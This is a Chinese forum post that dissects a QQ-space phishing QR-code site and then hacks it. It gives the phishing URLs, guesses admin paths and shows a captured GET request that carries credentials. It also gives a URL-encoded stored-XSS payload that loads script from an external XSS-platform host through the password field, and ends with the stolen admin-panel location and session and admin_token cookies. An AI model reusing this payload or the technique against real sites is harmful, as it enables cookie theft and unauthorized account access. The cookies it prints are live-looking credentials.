分析QQ空间私密相册二维码盗号网站 进攻 删库

请转发分享给你的朋友,不要在上当受骗了。

下面是详细分析

今天在论坛看见两个说盗号的帖子

我就来简单分析一下大神勿喷

盗号二维码的指向为http://asdfg.b5069.cn/?_wv=3

首先可以用pc端浏览器打开 说明 这个网站不够完美。没有判断是不是手机端还是pc端

很多高明的钓鱼网站在PC端打开会直接跳转企鹅官方网站

我们怎么进攻这个钓鱼网站呢？

如果是我的话，我首先想到的是扫描他的后台地址 然后通过暴力破解后台账号密码

可以简单的尝试http://asdfg.b5069.cn/adminhttp://asdfg.b5069.cn/admin.php等等这些国际惯例的 后台地址

经过一番尝试 都是404O(∩_∩)O哈哈~ 比较菜 找不到后台地址

这个方法行不通，在而想到的是xss

通过xss可以获取后台地址 和 浏览后台当时的Cookie

因为盗号的人可能会在后台 查看盗取来的账号密码 所以我们把xss代码通过账号密码的途径种在他的后台里

然后我们现在来抓一下包

GET /index.php?name=12345678&pass=12345678 HTTP/1.1

Host: asdfg.b5069.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer:http://asdfg.b5069.cn/?_wv=3

Cookie: PHPSESSID=4o6eis0qc1l9n2rahhn2tufscn; Hm_lvt_939a35e2cad8dbce2b34fab2766a640b=1535808468; Hm_lpvt_939a35e2cad8dbce2b34fab2766a640b=1535808468

Connection: keep-alive

我使用1245678 的假账号 简单抓一下包 发现是 GET 方式 传输账号密码 一脸蒙 之前见都是Post方式的

既然这样就方便我们了种xss代码了

xss代码为

这个xss是在http://xsspt.com/ 里获取的 玩xss的都知道这个平台

这种是最基础的xss代码 一般后台加了防xss的 100%过滤

这个xss代码还有加工一下 随便一下 URL编码一下吧

%3Cscript%20src%3Dhttp%3A%2F%2Ft.cn%2FReaKqXf%3E%3C%2Fscript%3E

然后加在 刚刚协议的pass参数里 就像这样

http://asdfg.b5069.cn/index.php?name=12345678&pass=%3Cscript%20src%3Dhttp%3A%2F%2Ft.cn%2FReaKqXf%3E%3C%2Fscript%3E

为什么不加在name这个参数里呢 因为很明显 name 参数的值为账号 账号长度不超过10 如果后台判断一下很明显 种不进去 使用就加在密码里

简单的访问一下刚刚的那个地址

成功种进去了 现在就慢慢等我们的鱼打开 后台了

未完待续。。

时间 22:11

我们已经钓到鱼了 xss有效果了

返回的结果是

location : http://asdfg.965gm.cn/adminin/list.php

toplocation : http://asdfg.965gm.cn/adminin/list.php

cookie : admin_token=8bb1UF34graRk4K8T2oYJzDftbUNhFJGu0mEcN%2BMyQfvZ%2FdTJ%2BoCW6v%2FMAL9R%2B8IpjCVP7%2FjOovqqzcdzYQc76xiOjyp; PHPSESSID=08b5vpf0tigol38iml0qpamrh0; Hm_lvt_939a35e2cad8dbce2b34fab2766a640b=1535767223; Hm_lpvt_939a35e2cad8dbce2b34fab2766a640b=1535767302

opener :